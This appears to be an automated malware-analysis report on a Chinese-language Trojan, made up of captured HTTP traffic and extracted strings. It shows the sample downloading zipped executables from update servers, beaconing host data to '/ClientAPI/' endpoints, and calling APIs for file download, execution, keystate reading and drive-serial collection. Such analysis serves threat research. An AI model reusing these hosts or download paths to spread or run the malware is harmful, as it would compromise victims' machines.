n...kB.V.c.j.4~..!>..a.9 ~......@.A..p,:r..&.$...i.x>2@<.....
.Z|S)8..4....t!......0....?tYp.^.A..".O".I .m..J.....}...Z.........)..
>P..0.S.8...L2;..g...K.N..i../..x....(.ja.\^Q.f....W.. n*.t..x...|.
_Dx..?..w.#...'3...q....M.,m.......5.;........%.....T..*t..!.r..^9..
.ba.J..R_f.~....0..Rof.>.....L......*.......I.....-.f......'...]..q
....93I.N....qS...|.d....[,7....'vo.....$Q.(....N'u;2..M@)n.......X.:.
|.V.)..X[.V>...(..D.m......2H.{T/.........p..3...f......A..Q:'K
<<< skipped >>>

GET /update/100006/update/1_0_browser.exe.zip?rnd=1480156609 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: update.haimarj.com

Connection: Keep-Alive

Cookie: __cfduid=d387a695a86ee3c45fcb2926575c1c5941480156602

HTTP/1.1 200 OK

Date: Sat, 26 Nov 2016 10:36:50 GMT

Content-Type: application/x-zip-compressed

Content-Length: 110556

Connection: keep-alive

Last-Modified: Wed, 14 Sep 2016 14:15:44 GMT

Accept-Ranges: bytes

ETag: "e816497b92ed21:0"

X-Powered-By: ASP.NET

Server: yunjiasu-nginx

CF-RAY: 307cb39ba44d4efc-DME
PK...........I_...J....n......browser.exeUT....Z.W...WB.SW.|}|S.....%.
@....Z...s...E..J..#..&._lQ.~c..R....].w.../Sp....m..(..U..FS..".A..uv
.a.4.H.T........).....*..>/.9.<...<.y...2.$I...).$.K.o.t.?.A.
.^..Xim..K...v\r{..G...y.?k..A.w.~.......W\.y.......V^.......1cF]..x..
....GW,.....iQ/<.X....s..C.|g...L..\..<O...EI.s...E.-...E.......
.......B....uK.,....?....z$.a.a.$]d.L#.....m...F.%|..........LL.X`...O
PA,.~...7. &..U'..^K......o9}..m2f...Y|......7?..m...!...].X........wK
.'.....x^j.F...V....B......L.....y....N....(..y(........w...t.<.C..
J.....K...\*)...X*.._.%..P..R.0...b.......).bf.U.Mf*..P.w. I........=.
..*.&.K..w.....J..Hz...X|.t... .....Lc.dO..m...x.=..`.K..1.....m.b._..
zY.....o(....=V...7>. .Q...F....wl.......i."....g......<qv......
.i.D...`E......IVka;...|.`....#...p'.t......y.Zpu.:.....Dp'..........k
..X.9Rga...s.. .V=n........#..5|.)A/;....t.I....[...HQ.1.X..mg.K.y....
M.....m.......*.......c.p5>::..$q%..j.%....F6.S.>.t.G?....E}Fv@.
...{J......L...J.j.Yf..J....{..>.f,....v.!n.X...=....h..l.m........
.y..9...Z&.9.p..V.^..B....<...9..........^}.O.....R.x....R..[...yf.
....u....W_...m.up..]...].....Q.t..{..M..l.g...AW......|.q..txD.m.....
.=..7..<..O.........I...S. o.q|.{...........R3.L#. ..}.......#. ..^
.!^Dm[)g4....6aM....R|d....\{.$..@..bi.hB/E......?.(.TK.2...Y....Rk...
Cf.>.u..<..d....ti.].*-B..[..6......"!\....k ...G.....l.........
.s.5 .........D|....o..f2 h5O!y.....H..G..A0....9..,....Z.*e.3`a..rD.c
.U.J;.L3.L........0<M..M7..(...US.|...Q.U6..*@..|.[u.[%...2..E.
<<< skipped >>>

GET /update/100006/update/1_0_QtCore4.dll.zip?rnd=1480156620 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: update.haimarj.com

Connection: Keep-Alive

Cookie: __cfduid=d387a695a86ee3c45fcb2926575c1c5941480156602

HTTP/1.1 200 OK

Date: Sat, 26 Nov 2016 10:37:00 GMT

Content-Type: application/x-zip-compressed

Content-Length: 1047128

Connection: keep-alive

Last-Modified: Sun, 05 Jun 2016 13:30:50 GMT

Accept-Ranges: bytes

ETag: "1e4ecb792ebfd11:0"

X-Powered-By: ASP.NET

Server: yunjiasu-nginx

CF-RAY: 307cb3ded3cc4efc-DME
PK........8.9G..........'.....QtCore4.dllUT...K[.V%.SW%.SW.Z{x.U..JW."
...6.G"i........`.L..10..C...:".`.B.^a.X.63.w{.of.s..].wwv...sH..v'.N.
.q.MC.A. K.Oy..{.....~$......%U.......>......oeL..p...3L ......<
.0.../d...wB [.wB......^.D.....W,...'.......<n..q......=...i7.P.Pu.
..yc.5.Y.o....#pm.....O.rY.\.......O..)6Pv.U.?R....- ...e=.:.^.......P
.....2L5.....{...........y..a.....7.e..n~[..&z..0...6..W.;3..u.~.T..T.
..U.\..<..c.81.y...I..\...&1...<&..a7.....e.O.?...../. ...)x;.&l
t;0m.......X.E.{'\_)6....i..)...m..0S..8)......5 ........u..t}k.z.....
.........p....}._...o..z..!g/...o'._....)h.m.B.........v.?.N......D..K
.8F.hHP.<....Vu...~.#...5.e.[....m.^..eh:.G...G..8x..W.N.J..2...x..
..8N..y.}.E...*L.o/...g...C.....X.O.4.c.d0........K..eO.9 ....#....f..
.....5.D6.&)....F..v.o.v..#"p.NB.g....~...t.V..Lk..'....... h..:P..u.z
......x......7.r....x7.,-Uf"rnx...:.|...}..o..F........U...@.:~..f.?..
.H.$...T....3..9..c.y....;...%.\{&},.c...=.a..AhR.WQ...r........sUp..c
C$.'.-..V........O.......).....z'.L9...G.$I.G..]..>[o....=i.Wh...z.
.n.zF..$..m.D3q...v.JU.D.I||....P...r K.}vy~oA...<.Qa.&...7..2.|..O
..W.o2.D.d..a.t...r./I...T.0d..;(......r[.p.U..~../3.&......[[.QD.g{..
.#.g..cF.W..........=#>....0V...\1..u.H_B.p....Ac#...<c....xN...
..<.G/....B..)..bz..1...X.yu|......d.:..x....[..5.a..u.5...........
...?w.r.E]...L..\rO...'.....b../.`.Jy&..).dY_.....g9L._..$u.B..._..~pf
\G...:8g. .X.F]y[J..../R./...P.{.g\...m.....c<Q..1..?s.p..(.V..d.!C
=.G.....8........>J~..........* .._.v......C.........%. .Y.:>
<<< skipped >>>

GET /update/100006/update/1_0_QtGui4.dll.zip?rnd=1480156636 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: update.haimarj.com

Connection: Keep-Alive

Cookie: __cfduid=d387a695a86ee3c45fcb2926575c1c5941480156602

HTTP/1.1 200 OK

Date: Sat, 26 Nov 2016 10:37:16 GMT

Content-Type: application/x-zip-compressed

Content-Length: 3716649

Connection: keep-alive

Last-Modified: Sun, 05 Jun 2016 13:30:51 GMT

Accept-Ranges: bytes

ETag: "89147d7a2ebfd11:0"

X-Powered-By: ASP.NET

Server: yunjiasu-nginx

CF-RAY: 307cb44187614efc-DME
PK........h4.F%h1_..8..:......QtGui4.dllUT.....KU%.SW%.SW.\}t.U.......
....!bs(fph.V.$c...4IFB.:..I......d.....l?R........cV.....z..3...d@d&l
t;3..t...[.8...ap....Uuw..Ju.....T.z.{...~...U...I2..b..".B....CL.Y...
.w."o..?.....y5m.~.l....-..:.5.w....]..-[.sn.....v....u.....t..{/.....
...<..............ano'\............g...4;{.f....n...z_...9:......Z.
a]...UA\AH.e*...\.}v....a..!\=!.o..r.V.........>...0.V..W..d.N...C.
..P"....e...%{..$;..D\.......c...UO...G7..6.9.....;Z.u.U.V....&...1.oi
i.h....i..p..38...X.....Q........q}...p.:..t.$.U{s{2.-..6...x:......&.
.......rA.Wx..:p..)^..O.p...!.9....~....O....N.&_.?..q.....>.......
<..I.|Xi.6...t....\...]..H...e.._).2..~.B.*.a.:.X.=V.:..t!.......ps
.~.ydH.R.....#..9..y:..)..Dz......:...`.-..p........dm...K.>.@.=.b.
.C.(Y.=....f..^....3...^..&@3j(%.......C9.....c/...7......C@0\N.`.....
....y..%..-./n.....R.....{.IR...<........F[t...(..o>=.V..Z......
......j....m`xL=.-...~.q..i....N9.8p.t|.........6..?....@.u....\B..kg.
..m.c....3..xl....T...p......?.?(Oyj... .K..["....r.;...W.......*...`e
...|..1.*_.........<..`..B..p..)G..3....p..M.0......8....-...3@....
.r..r.K...a.$~.,..,.o.-....../.z.L..8P'.O8.?.u|B.....&c...Q.).qBJx.. .
^.......#.N..xx.?.q.A.2B.....{..f...#...q.4S<..g....o...xE4^.<..
.Fo....'..-A....f.7.....A`...e...1-p... .....(/H....;.?2.c.>...x.9.
...)....=.s....g.....rp........R.P5..NL......DG..%..wVC.P.........H$4h
./._P.F.........-.e4`......'^.#...i...d......XqB.'..6..@..A...@.....k/
.6$.....-.e@.?.Nu<.'.w..|P.rx`..?.A4El........gts.:_...9..u....
<<< skipped >>>

POST /ClientAPI/flowtaskAPIV1.aspx?ran=180620906 HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

Accept-Language: zh-CN

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

Host: 6688.9935.org

Content-Length: 327

Cache-Control: no-cache

parems=40C524F39289042EF1ABB79032A1E422205421157EC3ED09E1C8698158D262D73F61B51CA1976787843B294C2383FDFCB270FA24A917BCB956AB016616237AF06493047041B1EBD04FF9CBA79FD40F9C13D86FD1D2D144098075C78E089441DBD569496D04E69E9F2D11A4A6F6983007650899305D2EC9AAFA9DA6E12C796BD29E69A2907F0E1075581D12A83F0D4D4BFC509FC746825AC176AEECB1C75329AE
HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 496

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Sat, 26 Nov 2016 10:37:19 GMT
47CF36AB6551793C8921CCC86BCCD08FA850026566EB5FED459973AA7B6D25502C474A
F448468EC924A1193ED5198DC0BB26F3C5F49AA51DD5D100E1DCB1251E7697F273E27F
01CDE2FBC9E352FDD8596353643F1CA544A3C3B0A0F012D5566CF5B60221927E6441E6
A70DB34DA14ABF5E374AEC21E0F775C2468EFEC74E2E75F4DC9E783F388FF13651F6B2
CEA23F7E1A0AC42634FD682ED299DAAE70A6A41FB2F1DF65F836501CEE909B7C2757AB
9F0CB5F9A3DCDB9172372B05526FCE8CC20592B35F084E4A14F2C6B35ABE2F5585531C
C2AE94F7C809415F20A9654EAF79BC981C8796B268CA64985697D6C6C4C6D6DDD13A67
B67CADHTTP/1.1 200 OK..Cache-Control: private..Content-Length: 496..Co
ntent-Type: text/html; charset=utf-8..Server: Microsoft-IIS/8.5..X-Asp
Net-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Sat, 26 Nov 2016 
10:37:19 GMT..47CF36AB6551793C8921CCC86BCCD08FA850026566EB5FED459973AA
7B6D25502C474AF448468EC924A1193ED5198DC0BB26F3C5F49AA51DD5D100E1DCB125
1E7697F273E27F01CDE2FBC9E352FDD8596353643F1CA544A3C3B0A0F012D5566CF5B6
0221927E6441E6A70DB34DA14ABF5E374AEC21E0F775C2468EFEC74E2E75F4DC9E783F
388FF13651F6B2CEA23F7E1A0AC42634FD682ED299DAAE70A6A41FB2F1DF65F836501C
EE909B7C2757AB9F0CB5F9A3DCDB9172372B05526FCE8CC20592B35F084E4A14F2C6B3
5ABE2F5585531CC2AE94F7C809415F20A9654EAF79BC981C8796B268CA64985697D6C6
C4C6D6DDD13A67B67CAD..

GET /update/107872/update/update_stworker.txt?rnd=1480156597 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: update.ttliuliang.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sat, 26 Nov 2016 10:36:42 GMT

Content-Type: text/plain

Content-Length: 263

Connection: keep-alive

Set-Cookie: __cfduid=d4bc30d1eb681bcaa0da9adc1517b61bd1480156602; expires=Sun, 26-Nov-17 10:36:42 GMT; path=/; domain=.ttliuliang.com; HttpOnly

Content-Encoding: gzip

Last-Modified: Wed, 14 Sep 2016 02:39:26 GMT

Accept-Ranges: bytes

ETag: "2552e43531ed21:0"

Vary: Accept-Encoding

X-Powered-By: ASP.NET

Server: yunjiasu-nginx

CF-RAY: 307cb36c355c4f38-DME
.............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{
....{....;.N'...?\fd.l..J...!....?~|.?"........._..............1......
...{....?..x|z....{....<9.}.....{'.................X..I.N....k|....
..<.......O...}.....O.....9~vz......'.>}. .W....dNg......
...


GET /update/107872/update/1_0_ttbrowser.exe.zip?rnd=1480156603 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: update.ttliuliang.com

Connection: Keep-Alive

Cookie: __cfduid=d4bc30d1eb681bcaa0da9adc1517b61bd1480156602

HTTP/1.1 200 OK

Date: Sat, 26 Nov 2016 10:36:43 GMT

Content-Type: application/x-zip-compressed

Content-Length: 12576077

Connection: keep-alive

Last-Modified: Wed, 14 Sep 2016 02:33:45 GMT

Accept-Ranges: bytes

ETag: "fcc8716a30ed21:0"

X-Powered-By: ASP.NET

Server: yunjiasu-nginx

CF-RAY: 307cb37144654f38-DME
PK.........T.I...5............ttbrowser.exeUT......W...W...V.|k`T.....
a..3.DQQ...XJ.Zt._.L.^Gg&.L.0.w..E.g. ..0....K-Ql.W-m..UzE..#/2.B....P
.5..f....$r...>g..d.x{...2...X{...Z{......\2I.d..."I... .N.g1H.....
(.-.~A............k..~..?*.........uoqmd~....g.RY.....w.....Ra.x.. ...
K.h..L........K.......|{.G.L..X.9<....%I.s...%.-...%[..Z.....=}...B
....qI.M..R.3.A-.O2....I.yF.4R..G@..^......^.H....R.....f............ 
.HO..p.R.%../@...t...4......}.x..>z...{...y...@.i5g.)..;...sg.NI.d.
A......Y.......T........4..k.Z.P...N....8..y$..{.......&@.]...(W>..
....Gw~.h.^H.....#.....$.....}..}.>......a....r..i.R'..Y2..$.(..S.]
.C.0.;;.R......Z.T...0.=S. ......Gg...U.O..N...%.:.\..E.;o....gI..=...
=..4v@v....o....C..6..k.s.. ..6 ..5...u...........cU..{....m...i.O...&
f..A..m...S..drV......c.....y..35|.IKe ....=..$......a>...g}.!VeM..
(..=...d.....u.Jx...........C......c....[XB.......U......B.....V._`J..
.(E. .BR2BA....!R.}.*..s...Ro....D....mt.=^.d ..U4...U....t6?4>..$q
%....%...CF6.S.^.pTF.....y.F.O.....J...=..M.V....X...-.$....x.}n.D6..l
......u..:...0.&..M.-ag...../..B..k.\....N..h E/Cs....A.....F..N(/.@.w
.........)v4^..f.h.-z...3K.\..9.........m{w...wn]pz.q...fy.Y...c6.Wi.|
.!..vv,8..>..gjH...].....^...p.\.......0?.1..........D.'...../...i.
.(.Z.`...Q.....].....].........c...l^..CX...}........g..G..j7./..M..H.
;........5R..aCCVA.i..^ ..!3m..:..^(.d....ti.]..,B..[........V.......u
A...Q...}:......U. h......[...P|.h">..@...^{. h7. y.....H..G..A0...
.9..,......*e..oa..JD.m.U.*;.L .L........0:M..M7|.(...U..|...Q.u6n
<<< skipped >>>

GET /gj/ver.txt HTTP/1.1

Accept: */*

Connection: Keep-Alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

Host: down.9935.org

HTTP/1.1 404 Not Found

Content-Type: text/html

Server: Microsoft-IIS/8.0

X-Powered-By: ASP.NET

Date: Sat, 26 Nov 2016 10:41:26 GMT

Content-Length: 1163
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=gb2312"/>..<title>404 - ..
................</title>..<style type="text/css">..<!--
..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, 
sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} .
.h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0
;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;
} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family
:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#55
5555;}..#content{margin:0 0 0 2%;position:relative;}...content-contain
er{background:#FFF;width:96%;margin-top:8px;padding:10px;position:rela
tive;}..-->..</style>..</head>..<body>..<div i
d="header"><h1>..........</h1></div>..<div id=
"content">.. <div class="content-container"><fieldset>.
.  <h2>404 - ..................</h2>..  <h3>........
..............................................</h3>.. </field
set></div>..</div>..</body>..</html>....

GET /rj/flowtips.html HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: VVV.4345.cc

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/html

Content-Encoding: gzip

Last-Modified: Fri, 25 Nov 2016 07:12:22 GMT

Accept-Ranges: bytes

ETag: "0fb44eb46d21:0"

Vary: Accept-Encoding

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sat, 26 Nov 2016 10:36:38 GMT

Content-Length: 1804
...........X{O.W...H.....@.=6...Z..*HI........s...f.3c.....K..V....KH.
...bS7..v.d.m.y.D."..}.......@..{...s~..k{..u.....)*......;.twR..M_h..
....u......iwP~...N.D..i......RU.E..H..i..r...I.",'2..6.digU..;z..O...
...........e.........m..07..t............'.E..*...T ...P....fg.......&
lt;... .8.`-=1.....)...T.u.H_X. .....].... G...!N.wwyY1......@=......f
..9...o.=.n............. .H&ISYr.c..I.\...\0..d-e.....I.jBd8..M..fOD.B
...\.)..=.W.z@.y....=...W@..n*|...Cl<...w......._..3^.AFV!.%o....V.
.....]..]Q.x`..~./F.z....K.cY X...xAf ............B$GUq...9H..h.z...W.
T...... ...o..j..oHg=ZZ..c.U(.]..j.fE...$.....#H^.i.....[..."......A..
IX....a..].c.o.5@.P.sB......&Q(W..IDu....bX...R..wi..Xl...#w.Q".0.n.y.
."..;.&. `.:.2]....@..&..g..r....De..s...@'k..|n..r.....h..V.(..|.....
.........yBX=..=;.R.Tz..v.9..*..Fz.2../7...E........B..g..&.(.r.....l4
.&.JD.2..bP......s...4q...Xi.X:.f.....3.c..aY..\W.......;c..v.H<...
h.Y..oh...U[..u.q.....s.]..y.....2.,....8#...i:LF..>.P....B.!......
~.5.6m.RI....L......t..6x......]....B.N........._.......!.........b./.
.!H.1G.V......3.....f.y&.6.h1aU4.....f.(.@.P. ..<.R......r......,..
...y....;....@B......>.AkS.....l1mEt.^.... .....\PpQ..>N.g@..!..
...O6....D.......s.......K~.........]H..j\.]..1.==]...D..%T.....@.....
.u.0zEv.........~ .~....7..Zd.....|..(...... ....f...w.w.^.<...y?79
...........{[,>...2UHj.. kk[.h,.....CC....^$.I....t,>..on...L|..
.....x8.|s....mDg....3.."............#.i....8Z.ww.Sogvr...9...t...k;..
.d....z.p..[S.f.....?.rm..o..1C....L...]x.....Xf.........yr.b4....
<<< skipped >>>

POST /ClientAPI/StatisticsUserAPI.aspx?ran=1763564114 HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

Accept-Language: zh-CN

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

Host: x1.2466.cc

Content-Length: 303

Cache-Control: no-cache

parems=eyJjb2RlIjoiRkFGNUI5QzkzMDAxREU2QzYwRDREOTYwMzAzQzREODgiLCJkYXRlZmlyc3QiOiIyMDE2LTExLTI2IDEyOjM2OjU5IiwiZXhlYyI6InRyYW5zZmVyX2NsaWVudHMiLCJmbG93dHMiOjMsImdldHRhc2tsYXN0dGltZSI6IiIsImlkIjoiNzMyMTk2IiwiaXAiOiIxOTQuMjQyLjk2LjIxOCIsInNyYyI6ImVjZjU3NDAwZSIsInR5cGUiOiJndWFqaSIsInZlcnNpb24iOiIxNDA4In0K
HTTP/1.1 200 OK

Cache-Control: private,no-cache

Pragma: no-cache

Content-Length: 1

Content-Type: text/html; charset=utf-8

Expires: 0

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Sat, 26 Nov 2016 10:37:09 GMT
1HTTP/1.1 200 OK..Cache-Control: private,no-cache..Pragma: no-cache..C
ontent-Length: 1..Content-Type: text/html; charset=utf-8..Expires: 0..
Server: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..X-Powered-By: 
ASP.NET..Date: Sat, 26 Nov 2016 10:37:09 GMT..1..

GET / HTTP/1.1

Accept: */*

Connection: Keep-Alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

Host: VVV.ip138.com

HTTP/1.1 200 OK

Date: Sat, 26 Nov 2016 03:48:36 GMT

Content-Length: 18658

Content-Type: text/html

Content-Location: hXXp://VVV.ip138.com/index.htm

Last-Modified: Tue, 01 Nov 2016 11:27:18 GMT

Accept-Ranges: bytes

ETag: "d2b8ace73234d21:13856"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 24505

X-Via: 1.1 db77:5 (Cdn Cache Server V2.0)

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..
<html>..<head>..<meta http-equiv="Content-Type" content
="text/html; charset=gb2312">..<meta name="mobile-agent"content=
"format=html5; url=hXXp://m.ip138.com/">..<title>IP........--
.................. | ............ | ............ | ...................
.....</title>..<meta name="Keywords" content="ip,IP....,IP...
.....,ip138">..<meta name="Description" content="ip,IP....,IP...
.....,ip138">..<script language="javascript">..<!--..if(wi
ndow.top!=window.self)window.top.location.href='hXXp://VVV.ip138.com/'
;..function checkIP()..{...var ipArray,ip,j;...ip = document.ipform.ip
.value;...if (ip.indexOf(" ")>=0){3....ip = ip.replace(/ /g,"");...
.document.ipform.ip.value = ip;...}...if (ip.toLowerCase().indexOf("ht
tp://")==0){....ip = ip.slice(7);....document.ipform.ip.value = ip;...
}...if (ip.toLowerCase().indexOf("hXXps://")==0){....ip = ip.slice(8);
....document.ipform.ip.value = ip;...}...if (ip.slice(ip.length-1)=="/
"){....ip = ip.slice(0,ip.length-1);....document.ipform.ip.value = ip;
...}...if(/[A-Za-z_-]/.test(ip)){....if(!/^([\w-] \.) ((ac)|(ad)|(ae)|
(af)|(ag)|(ai)|(al)|(am)|(an)|(ao)|(aq)|(ar)|(as)|(asia)|(at)|(au)|(aw
)|(az)|(ba)|(band)|(bb)|(bd)|(be)|(bf)|(bg)|(bh)|(bi)|(bid)|(biz)|(bj)
|(bm)|(bn)|(bo)|(br)|(bs)|(bt)|(bv)|(bw)|(by)|(bz)|(ca)|(cc)|(cd)|(cf)
|(cg)|(ch)|(ci)|(ck)|(cl)|(click)|(club)|(cm)|(cn)|(co)|(co\.in)|(co\.
nz)|(co\.uk)|(com)|(com\.ag)|(com\.br)|(com\.bz)|(com\.cn)|(com\.c
<<< skipped >>>

GET / HTTP/1.1

Accept: */*

Connection: Keep-Alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

Host: VVV.ip138.com

HTTP/1.1 200 OK

Date: Sat, 26 Nov 2016 03:48:36 GMT

Content-Length: 18658

Content-Type: text/html

Content-Location: hXXp://VVV.ip138.com/index.htm

Last-Modified: Tue, 01 Nov 2016 11:27:18 GMT

Accept-Ranges: bytes

ETag: "d2b8ace73234d21:13856"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 24525

X-Via: 1.1 db77:5 (Cdn Cache Server V2.0)

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..
<html>..<head>..<meta http-equiv="Content-Type" content
="text/html; charset=gb2312">..<meta name="mobile-agent"content=
"format=html5; url=hXXp://m.ip138.com/">..<title>IP........--
.................. | ............ | ............ | ...................
.....</title>..<meta name="Keywords" content="ip,IP....,IP...
.....,ip138">..<meta name="Description" content="ip,IP....,IP...
.....,ip138">..<script language="javascript">..<!--..if(wi
ndow.top!=window.self)window.top.location.href='hXXp://VVV.ip138.com/'
;..function checkIP()..{...var ipArray,ip,j;...ip = document.ipform.ip
.value;...if (ip.indexOf(" ")>=0){3....ip = ip.replace(/ /g,"");...
.document.ipform.ip.value = ip;...}...if (ip.toLowerCase().indexOf("ht
tp://")==0){....ip = ip.slice(7);....document.ipform.ip.value = ip;...
}...if (ip.toLowerCase().indexOf("hXXps://")==0){....ip = ip.slice(8);
....document.ipform.ip.value = ip;...}...if (ip.slice(ip.length-1)=="/
"){....ip = ip.slice(0,ip.length-1);....document.ipform.ip.value = ip;
...}...if(/[A-Za-z_-]/.test(ip)){....if(!/^([\w-] \.) ((ac)|(ad)|(ae)|
(af)|(ag)|(ai)|(al)|(am)|(an)|(ao)|(aq)|(ar)|(as)|(asia)|(at)|(au)|(aw
)|(az)|(ba)|(band)|(bb)|(bd)|(be)|(bf)|(bg)|(bh)|(bi)|(bid)|(biz)|(bj)
|(bm)|(bn)|(bo)|(br)|(bs)|(bt)|(bv)|(bw)|(by)|(bz)|(ca)|(cc)|(cd)|(cf)
|(cg)|(ch)|(ci)|(ck)|(cl)|(click)|(club)|(cm)|(cn)|(co)|(co\.in)|(co\.
nz)|(co\.uk)|(com)|(com\.ag)|(com\.br)|(com\.bz)|(com\.cn)|(com\.c
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.rsrc

FtPh

.uAF;

<4,$?7/'

(3-!0,1'8"5.*2$

deflate 1.2.7 Copyright 1995-2012 Jean-loup Gailly and Mark Adler

1.2.7

inflate 1.2.7 Copyright 1995-2012 Mark Adler

MFC42.DLL

MSVCRT.dll

_acmdln

WinExec

KERNEL32.dll

RegisterHotKey

UnregisterHotKey

GetKeyState

GetAsyncKeyState

USER32.dll

GetViewportExtEx

GDI32.dll

RegCloseKey

RegCreateKeyA

RegOpenKeyA

ADVAPI32.dll

ShellExecuteA

SHELL32.dll

COMCTL32.dll

ole32.dll

OLEAUT32.dll

URLDownloadToFileA

urlmon.dll

MSVCP60.dll

SHLWAPI.dll

NETAPI32.dll

iphlpapi.dll

WINMM.dll

IMAGEHLP.dll

HttpQueryInfoA

FindCloseUrlCache

FindNextUrlCacheEntryA

FindFirstUrlCacheEntryA

DeleteUrlCacheEntry

WININET.dll

VERSION.dll

%s\%s

hmflower.ini

m_dwHotKey

"%s" "%s" "wait=%d"

update_hmflower.txt

%s%d/update/

- V%s

1.0.04

hXXp://hf.haimarj.com/clnt/tips_flownews.htm

hXXp://hf.haimarj.com/?act=introduce

hXXp://hf.haimarj.com

hXXp://%s.%s/

haimasoft.com

haimarj.com

register.htm

[%d/%d]

%s.exe

HmFlowerApp_HOTKEY

&ip=%s

hXXp://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js

hXXp://ip.taobao.com/service/getIpInfo.php?ip=%s

apikey: a97c11bc9aa6b786403a2fa84a1cdcf4

hXXp://apis.baidu.com/apistore/iplookupservice/iplookup?ip=%s

hXXp://ip-api.com/json

hXXp://1212.ip138.com/ic.asp

hXXp://ip.chinaz.com/getip.aspx

hXXp://VVV.ip.cn/

xxxxxx

%d ReadPhysicalDriveInNTWithAdminRights ERROR No device found at iPosition %d (%d)

%d ReadPhysicalDriveInNTWithAdminRights ERROR DeviceIoControl() %d, DFP_GET_VERSION) returned 0, error is %d

%d ReadPhysicalDriveInNTWithAdminRights ERROR ,CreateFileA(%s) returned INVALID_HANDLE_VALUE

\\.\PhysicalDrive%d

%d ReadPhysicalDriveInNTUsingSmart ERROR DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d

%d ReadPhysicalDriveInNTUsingSmart ERROR, CreateFileA(%s) returned INVALID_HANDLE_VALUE Error Code %d

DeviceIOControl IOCTL_STORAGE_QUERY_PROPERTY error = %d

%s ReadPhysicalDriveInNTWithZeroRights ERROR DeviceIoControl(), IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 0

%d ReadPhysicalDriveInNTWithZeroRights ERROR CreateFileA(%s) returned INVALID_HANDLE_VALUE

\\.\Scsi%d:

%s^%s

%sX

[%d]%s

[%d]%s%s

%s:%u

hXXp://

hXXps://

%s_dddddd.log

%s.log

%s %s

{X-X-X-XX-XXXXXX}

Content-Type: application/x-www-form-urlencoded

Content-Type: multipart/form-data; boundary=%s

---------------------------%s

%s: %s

%s=%s

--%s--

; filename="%s"

Content-Disposition: form-data; name="%s"

.PAVCInternetException@@

[%u]%s

httpOnly

.PAVCException@@

hXXps://amos.im.alisoft.com/msg.aw?

hXXps://amos.alicdn.com/getcid.aw?

hXXps://VVV.taobao.com/webww

hXXps://amos1.taobao.com

hXXp://amos.im.alisoft.com/msg.aw?

